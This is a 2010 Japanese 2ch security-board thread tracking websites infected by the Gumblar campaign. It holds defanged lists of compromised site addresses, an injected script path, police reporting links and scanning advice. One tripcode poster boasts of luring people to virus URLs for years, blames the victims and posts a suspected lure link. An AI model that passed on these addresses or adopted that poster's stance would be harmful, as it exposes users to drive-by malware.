893 :名無しさん@お腹いっぱい。:2010/05/20(木) 17:03:40
>>890
ああ通報しちまおうぜ
つーか今まで捕まらなかったのが不思議なくらいだ

894 :名無しさん@お腹いっぱい。:2010/05/20(木) 17:47:12
警察への匿名通報ってどこからおくればいいんだっけ

895 :名無しさん@お腹いっぱい。:2010/05/20(木) 17:54:23
交番へ行く

896 :名無しさん@お腹いっぱい。:2010/05/20(木) 20:20:31
http://www.underforge.net/8080-domains-list/

897 :名無しさん@お腹いっぱい。:2010/05/20(木) 21:10:49
(VдV) ◆yUyb3Tqn92に騙されたおバカちゃんへ

転んでも泣かない。。。( ̄ー ̄)ニヤリッ

898 :名無しさん@お腹いっぱい。:2010/05/20(木) 21:28:34
ちゃんと名前入れとけよw

899 :名無しさん@お腹いっぱい。:2010/05/20(木) 22:03:12
○通報先・便利なリンク一覧
■警視庁匿名通報フォーム(通報は2chのように書き込むだけ)
 http://www.keishicho.metro.tokyo.jp/anket/other.htm
■全国ハイテク警察リンク集 http://www002.upp.so-net.ne.jp/dalk/ksatulink.html
■警視庁ホームページ http://www.keishicho.metro.tokyo.jp/
■警察総合相談電話番号 http://www.npa.go.jp/safetylife/soudan/madoguchi.htm
 (携帯電話・PHSからは全国共通#9110 緊急性を要するものは110)
■公安調査庁 http://www.moj.go.jp/KOUAN/
■国家公安委員会 http://www.npsc.go.jp/
■国際刑事警察機構(ICPO) http://www.interpol.int/
■国防省(アメリカ) http://www.defenselink.mil/



交番勤務の巡査じゃわからないかもしれないから
普通に被害に遭うかあいかけたなら
自分の近くの警察署か道府県警察か警視庁でいい

広域犯罪なら警視庁とか管轄外に通報しても
受け付けてくれると言えば受け付けてくれると思う

900 :名無しさん@お腹いっぱい。:2010/05/20(木) 22:22:29
うお
そのコピペ探してたんだ
サンクス

901 :(VдV) ◆yUyb3Tqn92 :2010/05/21(金) 08:27:41
>>889
いつの話ししてるんだお前
とっくに移転したぜ。
今は隠れサイトとしてやってるけど
最近あんま更新してない

>>891
そういう発想貧困なレスされてもなァ
せめてネット牛若丸とか捻ったこと言えるようになろうぜ凡人(>w<)

902 :(VдV) ◆yUyb3Tqn92 :2010/05/21(金) 08:29:53
更に俺様のターン(V`д´V)

(VдV)通報ネタももう見飽きてるお
通報通報と言ってるのは、所詮、俺様にウィルス踏まされた奴の負け犬の遠吠え┐(VДV)┌ =3
もうかれこれ3年以上も前からゲーム感覚でウィルスURL踏ませてるが
見ての通りヽ(VдV)ノぴんぴんしてるおWWW

その時点で気づけよ馬鹿ども
俺様の完全勝利だということにね(VдV)v

903 :名無しさん@お腹いっぱい。:2010/05/21(金) 08:50:46
>>902
オマエもツメが甘いなぁ

捕まってから泣かないように。

904 :(VдV) ◆yUyb3Tqn92 :2010/05/21(金) 09:15:23
>>903
それって全然、反論にすらなってないぜ?
どこがどう詰めが甘いのか説明できてない時点で不合格(>w<)
捕まってから・・・とか君の願望を言われても負け惜しみにしか聞こえないお(>w<)
だってさあ〜♪いくら吠えたところでもうわかるでしょ?WWW

見ての通り俺様ぴんぴんしてるしヽ(VдV)ノ調子に乗り乗りなので〜♪
じゃあもう一回言うぞ?Wこれで止め刺すぞWWWW

俺様がぴんぴんしてる時点で気づけよ低脳WWW
v(VДV)俺様の完全勝利だということにね(VДV)v

905 :名無しさん@お腹いっぱい。:2010/05/21(金) 09:27:28
ウザコテだが何気に言ってることは正論なので困る
どちらにしてもウザコテの煽りをスルーできなかった>>903の負けでOK
てかスレチ杉、周りの迷惑考えろks

906 :名無しさん@お腹いっぱい。:2010/05/21(金) 10:05:29
>>905
自演か
お前のことを擁護するような間抜けはここにはおらん

>>904
顔文字の力借りなきゃやってられないような馬鹿はすっこんでろ
今年幾つだ?中年


907 :名無しさん@お腹いっぱい。:2010/05/21(金) 10:26:52
いい加減 他所でやれや

908 :名無しさん@お腹いっぱい。:2010/05/21(金) 10:37:22
901 : ◆yUyb3Tqn92 :2010/05/21(金) 08:27:41
    >>889
    いつの話ししてるんだお前
    とっくに移転したぜ。
    今は隠れサイトとしてやってるけど
    最近あんま更新してない

    >>891
    そういう発想貧困なレスされてもなァ
    せめてネット牛若丸とか捻ったこと言えるようになろうぜ凡人
902 :◆yUyb3Tqn92 :2010/05/21(金) 08:29:53
    更に俺様のターン

    通報ネタももう見飽きてるお
    通報通報と言ってるのは、所詮、俺様にウィルス踏まされた奴の負け犬の遠吠え
    もうかれこれ3年以上も前からゲーム感覚でウィルスURL踏ませてるが
    見ての通りぴんぴんしてるお

    その時点で気づけよ馬鹿ども
    俺様の完全勝利だということにね
904 :◆yUyb3Tqn92 :2010/05/21(金) 09:15:23
    >>903
    それって全然、反論にすらなってないぜ?
    どこがどう詰めが甘いのか説明できてない時点で不合格
    捕まってから・・・とか君の願望を言われても負け惜しみにしか聞こえないお
    だってさあ〜いくら吠えたところでもうわかるでしょ?

    見ての通り俺様ぴんぴんしてるし調子に乗り乗りなので
    じゃあもう一回言うぞ?これで止め刺すぞ

    俺様がぴんぴんしてる時点で気づけよ低脳
    俺様の完全勝利だということにね

909 :名無しさん@お腹いっぱい。:2010/05/21(金) 11:50:51
>>903
削除依頼を出してください
代行を使ってもかまいません
★整理削除依頼 代行依頼スレ★64
http://jfk.2ch.net/test/read.cgi/nanmin/1263120272/

エロ画像が規制になるように目に余るようなら削除人が規制議論に持って行ってくれるかもしれない

910 :名無しさん@お腹いっぱい。:2010/05/21(金) 11:52:08
雑談スレはいらない

通常に戻せ

911 :名無しさん@お腹いっぱい。:2010/05/21(金) 12:33:59
戻るまで雑談してようぜ

912 :名無しさん@お腹いっぱい。:2010/05/21(金) 13:54:33
1日ウィルス体験
oc-akademy●com/taiken/1niti-3.html
topページは何とも無かったが…


913 :名無しさん@お腹いっぱい。:2010/05/21(金) 14:12:39
>>912
404


914 :名無しさん@お腹いっぱい。:2010/05/21(金) 14:18:31
>>912
academyだよね
taiken/wind.js

915 :名無しさん@お腹いっぱい。:2010/05/21(金) 14:28:04
>>913
手打ちしたから間違えてた
>>914
があってる



916 :名無しさん@お腹いっぱい。:2010/05/21(金) 15:24:26
取扱注意
www●pommerland-herb●com
またろりぽのサーバなわけだが…

917 :名無しさん@お腹いっぱい。:2010/05/21(金) 18:07:16
今現在有効な感染の確認方法は無いのかな
スペックの高いマシンだと重くなるとも思えないし

918 :名無しさん@お腹いっぱい。:2010/05/21(金) 18:11:09
ない
スキャンすればだいたいおk

919 :名無しさん@お腹いっぱい。:2010/05/21(金) 19:44:05
スキャンすれば大体、ドライブバイダウンロード用の
ダウンローダーがアンチウィルスに引っかかる

920 :名無しさん@お腹いっぱい。:2010/05/21(金) 21:26:11
じゃあ今までどおりCドライブをスキャンすればいいわけか

921 :名無しさん@お腹いっぱい。:2010/05/21(金) 21:52:49
フルスキャンでおねがいします

922 :名無しさん@お腹いっぱい。:2010/05/21(金) 21:54:47
DドライブやUSBメモリ、他のHHDにある可能性もあるのか

923 :名無しさん@お腹いっぱい。:2010/05/21(金) 22:13:30
このスレにたまに●に変えずに貼る奴がいるけど
まさかこのスレを開いただけで感染するなんてことは無いよな

924 :名無しさん@お腹いっぱい。:2010/05/21(金) 22:16:58
その程度の知識しかないならここに来ない方がいいよ

925 :名無しさん@お腹いっぱい。:2010/05/21(金) 22:30:28
>>923
お前にはここがお似合いだ
http://pc11.2ch.net/pcqa/

926 :名無しさん@お腹いっぱい。:2010/05/21(金) 22:30:43
火消し工作でウイルスを張るの止めてくれないかな
http://mimizun.com/log/2ch/news/1272270703/324
http://mimizun.com/log/2ch/news/1272271109/258
http://hissi.org/read.php/news/20100427/V2dmT3Y4RkQ.html
http://hissi.org/read.php/news/20100427/RG04ODN6Wks.html
http://hissi.org/read.php/news/20100402/Z3JMSVFZZ2w.html
http://mimizun.com/log/2ch/news/1270234103/286
http://hissi.org/read.php/news/20100403/ME9Jbmk1cHg.html
http://hissi.org/read.php/news/20100404/OGNFNTIrQlc.html
http://mimizun.com/log/2ch/news/1270379088/51
http://hissi.org/read.php/news/20100405/b0g1eHZxbzE.html
http://mimizun.com/log/2ch/news/1272180292/308
http://mimizun.com/log/2ch/news/1273571993/728-742

927 :名無しさん@お腹いっぱい。:2010/05/21(金) 22:56:32
>>926
まとめて報告すればおk

928 :名無しさん@お腹いっぱい。:2010/05/22(土) 13:09:12
うお、gredがデザイン変わったぞ

929 :名無しさん@お腹いっぱい。:2010/05/22(土) 16:07:12
www●mutenka-okada●com/blog/2010/02
www●mika-nakashima●com ←途中で切れている
nakaya-world●com/modules/bulletin
www●brand-crea●com/blog/cat15/cat32

930 :名無しさん@お腹いっぱい。:2010/05/22(土) 16:19:45
www●ftagent●jp←お詫び画面が改ざん

931 :名無しさん@お腹いっぱい。:2010/05/22(土) 16:25:38
http://virusscan.jotti.org/en

932 :名無しさん@お腹いっぱい。:2010/05/22(土) 20:49:36
質問スレより
http://pc11.2ch.net/test/read.cgi/sec/1266748206/756

404ページなんだけど404のbody前になにやら入っちゃってる
www●hokutendo●com/favicon●ico

リンク先.phpはもう無い模様
gredもaguseも404だとそれ以上見に行かないっぽいな

933 :名無しさん@お腹いっぱい。:2010/05/22(土) 20:55:26
http://pc11.2ch.net/test/read.cgi/sec/1266748206/761
こっち来んなw

934 :名無しさん@お腹いっぱい。:2010/05/23(日) 00:06:27
誰か電凸したのかな。

ガンブラー:大阪市の外郭団体サイトが感染 /大阪
ttp://headlines.yahoo.co.jp/hl?a=20100520-00000114-mailo-l27

935 :名無しさん@お腹いっぱい。:2010/05/23(日) 13:42:57
www●medidoll●com/
ラブドールのサイト。
他にラブドールメーカーの国内サイト16ほど見たけど、そっちは大丈夫みたい。

936 :名無しさん@お腹いっぱい。:2010/05/23(日) 13:52:16
予告:1000は俺が取る

937 :名無しさん@お腹いっぱい。:2010/05/23(日) 15:26:57
IDでないのにどうやって特定しろと
-糸冬-

938 :名無しさん@お腹いっぱい。:2010/05/23(日) 15:49:59
むしろ流れの遅い板で1000取って楽しいか?

939 :名無しさん@お腹いっぱい。:2010/05/23(日) 16:02:51
どっちにしても、1000取って嬉しいか?

940 :名無しさん@お腹いっぱい。:2010/05/23(日) 16:08:21
けっこううれしい

941 :名無しさん@お腹いっぱい。:2010/05/23(日) 16:10:41
ID出てるとしても今日中に1000行くとは思えないし意味無いわ

942 :名無しさん@お腹いっぱい。:2010/05/23(日) 16:39:43
canyonhardware●com
www●ikkaan●com
oceanplace●jp
fantastic-contact●com/ad/9/9/
junkmaria●web●fc2●com
atakizawa●com/at/5/4/index●html

943 :名無しさん@お腹いっぱい。:2010/05/23(日) 19:00:43
anny-bells●abkns●com

944 :名無しさん@お腹いっぱい。:2010/05/23(日) 19:42:22
常日頃から管理人がまじめなサイトとgumbler?何それ?なサイトの差だな

945 :名無しさん@お腹いっぱい。:2010/05/23(日) 20:04:20
>>944
真面目でもバカじゃ意味ない

946 :名無しさん@お腹いっぱい。:2010/05/23(日) 20:38:28
つーか意識の低いのが浮き彫りになっているな
管理者が馬鹿ではどうしようもない
どんなサイトだろうがまともな奴が管理人ならそれなりに安心できる

947 :名無しさん@お腹いっぱい。:2010/05/23(日) 23:33:50
危機管理能力のない管理者は管理を放棄したも同じ。

948 :名無しさん@お腹いっぱい。:2010/05/24(月) 00:44:10
てすt

949 :名無しさん@お腹いっぱい。:2010/05/24(月) 00:45:50
EPSON 高くて話にならないクソもの
DELL もうちょっとどうにかなれば最強なのに
GENO 最強の選択、最高のアワード! 世界が賞賛する比類なきコストパフォーマンス!

950 :名無しさん@お腹いっぱい。:2010/05/24(月) 01:10:41
950

951 :名無しさん@お腹いっぱい。:2010/05/24(月) 01:21:21
せやな

952 :名無しさん@お腹いっぱい。:2010/05/24(月) 05:43:31
やせな

953 :名無しさん@お腹いっぱい。:2010/05/24(月) 06:11:24
なせや

954 :(VдV) ◆yUyb3Tqn92 :2010/05/24(月) 06:58:09
(VдV)おw
先週、書き込みしたときのにまだレス付いてたのかお?
俺様に発想力についての指摘をされたことがよほど頭にきたと見える
うむ、悔しそうでなによりだ(>w<)やりぃ!
まぁ限がないので、勝者からの止めの言葉としては

(VдV)ざまぁ死ね

と、だけ言っておく。
とても冷めたクールな口調のセリフとして読もうな(Vд^)−☆やりぃ!

955 :名無しさん@お腹いっぱい。:2010/05/24(月) 06:59:49
昨日のワイドショーで選挙でツイッター活用とかやってた。
で、総務大臣が使ってたのブラウザがIE6な件www

お頭がこんなことではもうオワタorz

956 :名無しさん@お腹いっぱい。:2010/05/24(月) 07:03:54
Gumblarってボットネット構築してるの?

957 :名無しさん@お腹いっぱい。:2010/05/24(月) 07:06:12
お前らもうこんなスレ立てるなよ
(VдV) ◆yUyb3Tqn92←みたいな池沼がここでURL仕入れてその辺に貼ってる事実から目を逸らすなよ
悪いのは貼る奴とURL提供してるお前らな
両方とも責任とって首連れよksども

958 :名無しさん@お腹いっぱい。:2010/05/24(月) 07:07:17
追記
ウイルス作った奴も当然悪い
どっかの国みたく作った死刑にすればいい

959 :(VдV) ◆yUyb3Tqn92 :2010/05/24(月) 07:24:39
>>957-958
やあ、おはよう。てか久しぶり。
お前、前に俺様にウィルス踏まされて以来、俺様が降臨するスレに沸く奴だろう。
いつものキーワードでわかった。

それはそうと
お前が今書いたことは俺様じゃなくても馬鹿にされる内容だぜ
せめてもの情けとして、他の奴がお前を馬鹿にする前に俺様がお前を馬鹿にしてあげる

>悪いのは貼る奴とURL提供してるお前らな ←×

(VдV)悪いのは100%踏む奴
俺様がURL貼るのは殆んど2ch。
2chなんかで貼られたURLを馬鹿みたいにそのままクリックする奴が低脳で悪い
てかまさに俺様にウィルス踏まされた今のお前のこと(>w<)

>どっかの国みたく作った死刑にすればいい

どっか(笑)の国じゃなくて、ちゃんとどこの国かググってから書こうな(>w<)じゃなきゃミーハーだぜ

>ウイルス作った奴も当然悪い

(VдV)むしろ良いか悪いかで分けようと必死になってる幼稚な発想のお前が一番悪い



(VдV)以上
顔文字様による正論コーナーでした。




960 :(VдV) ◆yUyb3Tqn92 :2010/05/24(月) 07:26:51
顔文字の正論コーナーについて
ご意見やご感想がある方はこちらから(Vд^)−☆
http://www.google.co.jp/search?hl=&q=%EF%BC%88%EF%BC%87%D0%B4%EF%BC%87%EF%BC%89%E3%81%AE%E4%BF%BA%E6%A7%98%E3%83%96%E3%83%AD%E3%82%B0&sourceid=navclient-ff&rlz=1B3DVFA_ja___JP330&ie=UTF-8

実はグーグルにもインデックスされてます('д')v

961 :名無しさん@お腹いっぱい。:2010/05/24(月) 07:31:46
>>959
わかるようにわざと入れてんだよbk!
お前踏むほうが悪いとか前から言ってるけど本気だとしたら終わってるぞwwwwじゃあ殺される方が悪いのかよ?
この糞スレの住人だって踏む奴が悪いなんて開き直りみたいなこと言わんぞ?言ったとしたらお前の以遠確定なwwww

962 :名無しさん@お腹いっぱい。:2010/05/24(月) 07:33:02
>>960
ウイルス乙
誰もふまねーよwww

963 :(VдV) ◆yUyb3Tqn92 :2010/05/24(月) 07:38:55
>>961
ご意見・ご感想は
>>960

君があせって「以遠確定」とか(笑)書いてしまったことの反省文も待ってるお☆

964 :名無しさん@お腹いっぱい。:2010/05/24(月) 07:47:52
だからふまねーからwwwww
URLからしてグーグル装った偽サイトとかだろwwwバレてますからどんまい!w

965 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:12:04
これはクソコテに粘着してる名無しの方が痛すぎる
未成年なのか知らんけど、もっと知識つけてからネットしようよ
スレタイも見てくれ

966 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:15:35
未成年だろ
>>964からしてバカさ加減が溢れ出ている

967 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:30:35
>>959は確かに正論
さすがに踏む奴が100%悪いって考えには同意しかねるが
今沸いてるようなガキには良い薬になるかもな

968 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:35:12
>>966
は?

969 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:42:21
昨日体育祭で今日休みなんだろ

970 :名無しさん@お腹いっぱい。:2010/05/24(月) 11:39:42
>>936
http://blog-imgs-29-origin.fc2.com/c/h/e/chelsea2ki/2009_07_14_02.jpg

971 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:04:15
954 : ◆yUyb3Tqn92 :2010/05/24(月) 06:58:09
    おw
    先週、書き込みしたときのにまだレス付いてたのかお?
    俺様に発想力についての指摘をされたことがよほど頭にきたと見える
    うむ、悔しそうでなによりだやりぃ!
    まぁ限がないので、勝者からの止めの言葉としては

    ざまぁ死ね

    と、だけ言っておく。
    とても冷めたクールな口調のセリフとして読もうなやりぃ!
959 : ◆yUyb3Tqn92 :2010/05/24(月) 07:24:39
    >>957-958
    やあ、おはよう。てか久しぶり。
    お前、前に俺様にウィルス踏まされて以来、俺様が降臨するスレに沸く奴だろう。
    いつものキーワードでわかった。

    それはそうと
    お前が今書いたことは俺様じゃなくても馬鹿にされる内容だぜ
    せめてもの情けとして、他の奴がお前を馬鹿にする前に俺様がお前を馬鹿にしてあげる



972 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:05:08
>悪いのは貼る奴とURL提供してるお前らな ←×

    悪いのは100%踏む奴
    俺様がURL貼るのは殆んど2ch。
    2chなんかで貼られたURLを馬鹿みたいにそのままクリックする奴が低脳で悪い
    てかまさに俺様にウィルス踏まされた今のお前のこと

    >どっかの国みたく作った死刑にすればいい

    どっか(笑)の国じゃなくて、ちゃんとどこの国かググってから書こうなじゃなきゃミーハーだぜ

    >ウイルス作った奴も当然悪い

    むしろ良いか悪いかで分けようと必死になってる幼稚な発想のお前が一番悪い



    以上
    顔文字様による正論コーナーでした。
960 : ◆yUyb3Tqn92 :2010/05/24(月) 07:26:51
    顔文字の正論コーナーについて
    ご意見やご感想がある方はこちらから
    http://www.google.co.jp/search?hl=&q=%EF%BC%88%EF%BC%87%D0%B4%EF%BC%87%EF%BC%89%E3%81%AE%E4%BF%BA%E6%A7%98%E3%83%96%E3%83%AD%E3%82%B0&sourceid=navclient-ff&rlz=1B3DVFA_ja___JP330&ie=UTF-8

    実はグーグルにもインデックスされてます
963 : ◆yUyb3Tqn92 :2010/05/24(月) 07:38:55
    >>961
    ご意見・ご感想は
    つ>>960

    君があせって「以遠確定」とか(笑)書いてしまったことの反省文も待ってるお

973 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:23:45
>>954>>957>>958>>959>>960
スレをずっと見てきてる人間はわかるよ
書き込み時間帯、レス反応の短さ、内容
こんなものを自演するために人生の時間使ったわけ?

974 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:31:36
965 :名無しさん@お腹いっぱい。:2010/05 /24(月) 08:12:04
    これはクソコテに粘着してる名無しの方が痛すぎる
    未成年なのか知らんけど、もっと知識つけてからネットしようよ
    スレタイも見てくれ
966 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:15:35
    未成年だろ
    >>964からしてバカさ加減が溢れ出ている
967 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:30:35
    >>959は確かに正論
    さすがに踏む奴が100%悪いって考えには同意しかねるが
    今沸いてるようなガキには良い薬になるかもな

975 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:34:56
>>971-973
お前はどうしてそんなどうでもいいコピペのために人生の時間使っちゃってるの?w
お前が例のコテにぼろ糞言われてたガキだということは誰の目から見ても明らかだw
そうやって必死になるからコテの玩具にされるんだよ

976 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:36:27
967 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:30:35
    >>959は確かに正論
    さすがに踏む奴が100%悪いって考えには同意しかねるが
    今沸いてるようなガキには良い薬になるかもな

905 :名無しさん@お腹いっぱい。:2010/05 /21(金) 09:27:28
    ウザコテだが何気に言ってることは正論なので困る
    どちらにしてもウザコテの煽りをスルーできなかった>>903の負けでOK
    てかスレチ杉、周りの迷惑考えろks

977 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:41:32
書き込みから察するに
このコテハンの書き込みをコピペしてるコピペ厨(>>971-973,>>976)はずっとそのコテハンに粘着してるってことか
コテの相手するだけでも無駄なのにコピペで粘着するとか、そっちの方が人生の無駄遣いってことでFAだろwww


978 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:44:00
975 :名無しさん@お腹いっぱい。:2010/05 /24(月) 12:34:56
    >>971-973
    お前はどうしてそんなどうでもいいコピペのために人生の時間使っちゃってるの?w
    お前が例のコテにぼろ糞言われてたガキだということは誰の目から見ても明らかだw
    そうやって必死になるからコテの玩具にされるんだよ

979 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:47:51
www●herbyasan●com

980 :名無しさん@お腹いっぱい。:2010/05/24(月) 12:50:37
>>977
だからコピペしてるのはさっき顔文字にウイルス踏まされたのをこのスレのせいにしてたガキだろ
それがまだスレでふぁびょってるだけだから、ほっとけば疲れて消えるだけw

981 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:02:16
>>977
それらが一人のかきこみである可能性 ≦ >>977>>974が(VдV) ◆yUyb3Tqn92のかきこみである可能性 = その>>977と会話する>>980がまた自演である可能性w

982 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:06:46
なんか地雷を踏ませただの踏まされただの言ってるが
セキュの掲示板だぜ?
ちょっとした亜種くらいじゃ踏んでも感染しないだろ?
もし感染するような新種ならば
URLを貼った奴かて感染してる可能性が高いと思うがね
そのことに本人が知らなかっただけじゃねぇの?
単なる逆恨みのために拡散しただけじゃねぇの?くだらねぇ…

983 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:07:05
>>981
お前の頭の中が(VдV)のことでいっぱいなのはわかった
コテハン相手にそこまで必死になってる時点でコテハンの思い通り


984 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:08:55
セキュの掲示板wwwwwwwwwwwwwww

985 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:09:40
(VдV) ◆yUyb3Tqn92がまだ居るw

986 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:12:47
なんか馬鹿が勘違いしてるみたいだが
このスレにいる奴がみんなこの板の住人と思ってるのかよww
(VдV) ◆yUyb3Tqn92にウイルス踏まされた情弱がこのスレに泣きついてる状況でなにを言ってるんだ・・・
そうじゃなくても普段から質問スレと勘違いしてくる奴が多いだろう

987 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:16:25
お前らどんだけ顔文字好きなんだよwwwwww

988 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:19:13
(VдV) ◆yUyb3Tqn92さん、このスレにはいないのあなたを擁護する人なんていません。

989 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:20:05
あせるな
落ち着け
日本語でおk


990 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:22:55
>>989
は?

991 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:23:43
>>988
そこはタイプミスしたら駄目だろ
本人がいたらまたぼろ糞に指摘されてたとこだぞwww

992 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:25:02
コテつけろ顔文字馬鹿

993 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:25:48
1000なら開発者死刑

994 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:25:55
コテにウイルス踏まされて粘着してる奴は可哀想だけど
まずはあんなコテハンにウイルスを引っ掛けられた自分の無能さを恨みなさいw

995 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:26:48
ほぼ(VдV) ◆yUyb3Tqn92しか書き込んでない

996 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:30:14
さあここから自演コテの擁護でフィニッシュ!!!

997 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:30:42
スレチ 他でやってくれ

998 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:31:50
ウメ

999 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:32:57
ID出ないスレで自演コテには勝てないよ。

1000 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:33:02
1000なら(VдV) ◆yUyb3Tqn92の完全勝利!!!
>>999は苦しみながら悔しい思いをしながら死亡
更にそれ以外の弱者も普通に死亡

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

244 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)